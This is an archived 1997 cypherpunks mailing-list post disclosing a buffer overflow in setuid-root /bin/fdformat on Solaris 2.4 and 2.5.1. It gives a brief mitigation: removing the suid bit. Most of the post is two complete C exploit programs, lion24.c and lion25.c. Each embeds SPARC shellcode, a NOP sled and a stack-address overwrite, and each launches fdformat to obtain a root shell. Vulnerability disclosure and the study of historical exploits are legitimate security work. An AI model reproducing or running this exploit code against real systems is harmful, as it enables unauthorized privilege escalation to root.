1997-03-23 - Remake: buffer overflow in /bin/fdformat + exploit (Solaris2.X)

Header Data

From: Cristian Schipor <skipo@Math.PUB.Ro>
To: cypherpunks@toad.com
Message Hash: df4464ae9d7049e556127dbc8f2da4c8302a56ac03d840e0c85c57d930e7d8d4
Message ID: <Pine.SUN.3.95.970323175715.2710G-100000@euler.math.pub.ro>
Reply To: N/A
UTC Datetime: 1997-03-23 15:58:08 UTC
Raw Date: Sun, 23 Mar 1997 07:58:08 -0800 (PST)

Raw message

From: Cristian Schipor <skipo@Math.PUB.Ro>
Date: Sun, 23 Mar 1997 07:58:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Remake: buffer overflow in /bin/fdformat + exploit (Solaris2.X)
Message-ID: <Pine.SUN.3.95.970323175715.2710G-100000@euler.math.pub.ro>
MIME-Version: 1.0
Content-Type: text/plain



motto: " No one would have believed in the last years of the nineteenth
century that this world was being watched keenly and closely by
intelligences greater than man's and yet as mortal as his own; that as men
busied themselves about their various concerns they were scrutinised and
studied, perhaps almost as narrowly as a man with a microscope might scru-
tinise the transient creatures that swarm and multiply in a drop of
water."
			H.G.Wells - "The War of the Worlds"


Sun Mar 23 16:56:15 EET 1997 Romania

"Remake for bufer-overflow in find_media() now in /bin/fdformat"

The buffer overflow bug I posted to you in Mar 13 1997 is present in
/bin/fdformat too (which has in may solaris 2.4 and 2.5.1 distributions
the suid-exec bit on and it is owned by root). By exploiting fdformat with
suid-exec bit on, anyone can gain a root (or who is the owner of fdformat)
shell. So, to prevent an fdformat exploit, remove the suid-exec bit from
/bin/fdformat. 

Cristian Schipor - Computer Science Faculty - Bucharest - Romania
Email: skipo@math.pub.ro, skipo@sundy.cs.pub.ro, skipo@ns.ima.ro
Phone: 401-410.60.88

See http://www.math.pub.ro/security

My exploits (with argv[1] you can change the STACK_OFFSET, +- x, x=8*k
k=1,2,3,...): 

--------------------------- lion24.c ---------------------------------
/*
Solaris 2.4
*/

   #include <stdio.h>
   #include <stdlib.h>
   #include <sys/types.h>
   #include <unistd.h>
   
   #define BUF_LENGTH 264
   #define EXTRA 36
   #define STACK_OFFSET -56
   #define SPARC_NOP 0xa61cc013
   
   u_char sparc_shellcode[] =

   "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
   "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
   "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
   "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
   "\x91\xd0\x20\x08"
   ;
   
   u_long get_sp(void)
   {
   __asm__("mov %sp,%i0 \n");
   }
   
   void main(int argc, char *argv[])
   {
   char buf[BUF_LENGTH + EXTRA + 8];
   long targ_addr;
   u_long *long_p;
   u_char *char_p;
   int i, code_length = strlen(sparc_shellcode),dso=0;
   
   if(argc > 1) dso=atoi(argv[1]);
   
   long_p =(u_long *) buf ;
   targ_addr = get_sp() - STACK_OFFSET - dso;
   
   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
   *long_p++ = SPARC_NOP;
   
   char_p = (u_char *) long_p;
   
   for (i = 0; i < code_length; i++)
   *char_p++ = sparc_shellcode[i];
   
   long_p = (u_long *) char_p;
   
   for (i = 0; i < EXTRA / sizeof(u_long); i++)
   *long_p++ =targ_addr;
   
   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
   targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
   execl("/bin/fdformat", "fdformat   ", &buf[0],(char *) 0);
   perror("execl failed");
   }
------------------------------ end of lion24.c --------------------------

-------------------------------- lion25.c ------------------------------
/* 
Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on
2.5.1
*/

   #include <stdio.h>
   #include <stdlib.h>
   #include <sys/types.h>
   #include <unistd.h>
   
   #define BUF_LENGTH 364
   #define EXTRA 400
   #define STACK_OFFSET 704
   #define SPARC_NOP 0xa61cc013
   
   u_char sparc_shellcode[] =

   "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
   "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
   "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
   "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
   "\x91\xd0\x20\x08"
   ;
   
   u_long get_sp(void)
   {
   __asm__("mov %sp,%i0 \n");
   }
   
   void main(int argc, char *argv[])
   {
   char buf[BUF_LENGTH + EXTRA + 8];
   long targ_addr;
   u_long *long_p;
   u_char *char_p;
   int i, code_length = strlen(sparc_shellcode),dso=0;
   
   if(argc > 1) dso=atoi(argv[1]);
   
   long_p =(u_long *) buf ;
   targ_addr = get_sp() - STACK_OFFSET - dso;
   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
   *long_p++ = SPARC_NOP;
   
   char_p = (u_char *) long_p;
   
   for (i = 0; i < code_length; i++)
   *char_p++ = sparc_shellcode[i];
   
   long_p = (u_long *) char_p;
   
   for (i = 0; i < EXTRA / sizeof(u_long); i++)
   *long_p++ =targ_addr;
   
   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
   targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
   execl("/bin/fdformat", "fdformat", & buf[1],(char *) 0);
   perror("execl failed");
   }

--------------------------- end of lion25.c -------------------------------






Thread